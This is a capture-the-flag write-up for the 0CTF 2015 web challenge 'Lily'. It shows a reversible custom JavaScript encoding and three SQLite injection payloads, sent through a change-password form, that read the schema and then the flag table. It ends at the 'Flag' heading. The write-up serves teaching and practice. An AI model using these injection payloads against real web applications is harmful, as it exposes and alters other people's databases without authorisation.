Writeup: 0CTF 2015 - Lily

Information

• Category: web
• Points: 150

Description

Find a hidden note for Lily in the web service.

Writeup

The “change password” is vulnerable to sql injection.
The password is encrypted with a custom javascript function called encrypt.
The scripts are:

function post(path, params, method) {
    method = method || "post"; // Set method to post by default if not specified.

    var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", path);

    for(var key in params) {
        if(params.hasOwnProperty(key)) {
            var hiddenField = document.createElement("input");
            hiddenField.setAttribute("type", "hidden");
            hiddenField.setAttribute("name", key);
            hiddenField.setAttribute("value", params[key]);

            form.appendChild(hiddenField);
         }
    }

    document.body.appendChild(form);
    form.submit();
}
function encrypt(str)
{
	var array = str.split("");
	array = array.sort();
	var re=[array[0]];
	for(var i = 0; i < array.length; i++)
	{
		if( array[i] !== re[re.length-1])
		{
			re.push(array[i]);
		}
	}
	var length = re.length;
	var rot_x = Math.floor(length / 2);
	var ret = ""
	for (var i = 0; i < str.length; i++)
	{
		var offset = rot_x + re.indexOf(str[i]);
		if (offset >=  length) offset = offset - length;
		ret += re[offset];
	}
	return ret;
}

var s = encrypt("The quick BrowN fox JUMPS over the lazy dog.");
// "t.ygPUBwJgiSNcogzNdgkulqrgNaySgT.ygMvfegxN h"
encrypt(s);
// "The quick BrowN fox JUMPS over the lazy dog."

So, if we want to inject a query Q, we should invoke the modify password with
encrypt(Q).

Injection!

After some tries, we found out that the DBMS was sqlite.

encrypt("', Email=(SELECT sql FROM sqlite_master LIMIT 1,1), Username='tito");

encrypt("', Email=(SELECT sql FROM sqlite_master WHERE type='table' LIMIT 2,1), Username='tito");

encrypt("', Email=(SELECT flag FROM flag), Username='tito");

Flag